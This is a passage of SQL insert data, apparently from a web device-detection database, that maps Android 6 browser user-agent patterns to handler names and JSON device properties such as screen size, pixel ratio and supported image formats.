Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3111) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3112) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3115) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3211) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3212) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3216) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3311) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F3313) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F5121) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F5122) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F5321) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F5502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F552) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F6002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F7pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F8331) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; F8332) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FEVER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FL02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FLOW 4 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FP2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FRD-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FRD-L19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FREDDY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FREEDOM M303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS407) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS408) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS454) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS458) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS505) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS507) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS508) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS509) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS514) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS516) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS517) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS8001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FS8002) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FTJ152D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FTJ161B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FUN5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FX200,4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Fero_X1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FinePower C1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FinePower C3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FinePower C5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; FinePower D1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Flare S5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Flare_P1_Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Fractal) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Fresh4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Fuego 5.0+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; G1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; G55) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; G7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GEM-703L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GEOTEL_Note) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GIONEE P7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GO-CEL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GO1003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GO503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GO504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GOME 2016G68A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GRACE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; GT-I9300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Galaxy Tab 2) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_samsung_gt','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; General Mobile 4G Dual) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; General Mobile 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Gigaset GS160) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Grand Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Grand M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Grand Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Grand Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Grand X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; H1611) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; H1623) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; H5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; H60-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; H60-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HAMMER ENERGY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 